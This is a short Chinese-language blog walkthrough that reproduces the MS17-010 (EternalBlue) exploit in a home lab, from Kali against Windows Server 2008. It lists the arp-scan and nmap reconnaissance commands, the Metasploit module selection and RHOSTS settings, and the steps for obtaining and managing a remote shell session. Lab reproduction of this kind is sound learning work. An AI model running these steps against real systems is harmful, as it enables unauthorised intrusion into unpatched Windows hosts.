永恆之藍漏洞復現(ms17-010)

安一_AA發表於2024-03-25

永恆之藍漏洞復現(ms17-010)
環境
資訊收集
先掃描目標靶機IP
進入MSF檢視是否存在永恆之藍的漏洞
攻擊

永恆之藍漏洞復現(ms17-010)

環境

攻擊機:kali

靶機:Windows Server 2008

資訊收集

對ip進行收集開放什麼埠

先掃描目標靶機IP

因為在同一個內網之中

所以可以使用arp-scan -l 進行查詢

fig:

知道目標靶機IP(192.168.162.146)來進行更進一步的資訊收集

fig:

nmap -sV -P- 192.168.162.146

使用nmap進行192.168.162.146IP下的全埠掃描

這裡可以看出系統資訊為Windows Server 2008

進入MSF檢視是否存在永恆之藍的漏洞

msfconsole
#搜尋模組
search ms17-010
#使用模組
use 3

fig:

show options

檢視選項

fig:

set RHOSTS 192.168.162.146

設定目標IP

fig:

存在永恆之藍的漏洞

返回

攻擊

使用攻擊模組

search ms17-010

use 0

fig:

set RHOSTS 192.168.162.146

fig:

攻擊成功

fig:

輸入shell

進入cmd模式

fig:

exit 退出shell
background 把shell放入後臺

fig:

重新連線

sessions -i 1

fig:

相關文章